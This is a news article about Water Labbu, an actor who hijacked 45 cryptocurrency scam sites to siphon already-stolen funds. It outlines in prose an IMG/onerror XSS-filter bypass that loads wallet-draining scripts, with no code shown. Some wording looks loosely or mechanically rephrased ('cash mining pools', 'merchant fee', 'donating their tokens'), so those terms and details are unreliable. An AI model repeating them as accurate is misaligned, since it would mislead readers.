Cybersecurity researchers have discovered a hacker who compromised cryptocurrency scam sites and diverted already stolen funds (opens in a new tab) to his own wallets, and has already raised hundreds of thousands of dollars this way.
According to Trend Micro, a malicious actor named "Water Labbu" found and hacked 45 fraudulent websites and replaced their wallet addresses with his own. This way, all the funds that scammers trick people into handing over would actually go to him.
The scam sites are mostly fake cash mining pools. True liquidity pools work by asking people to lend their crypto to decentralized exchanges, to create a liquidity pool. This liquidity pool allows crypto traders to exchange their tokens directly (in a decentralized way, as opposed to a centralized way where a single entity provides the liquidity). Lenders make a profit by getting a portion of the merchant fee.
Fake sites, fake apps
In order to lend their cryptocurrencies, users must connect their wallets to the liquidity mining pool. Fake sites, on the other hand, just wait for people to connect their wallets and then empty them. Between creating fake apps and engaging in social media activities to promote the scam, there is a lot of work to be done. Water Labbu bypasses all of this, letting the original scammers do all the heavy lifting for them.
Trend Micro claims that the scammer has so far obtained more than €300,000 from nine identified victims.
"In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the 'onerror' event, in what is known as an IMG technique. XSS Bypass, to bypass Cross-Site Scripting (XSS ) filters," Trend Micro explains in its report. "The injected payload then creates another script element that loads another script from the tmpmetacom delivery server."
The script searches for new wallets containing at least 0,005 ETH or 22 USDT and, depending on the platform (Windows or one of the two mobile platforms), initiates the transfer.
To protect against these types of scams, Trend Micro warns that users should be very careful when connecting their wallets and make sure they have done their due diligence before donating their tokens.
Via: BleepingComputer (Opens in a new tab)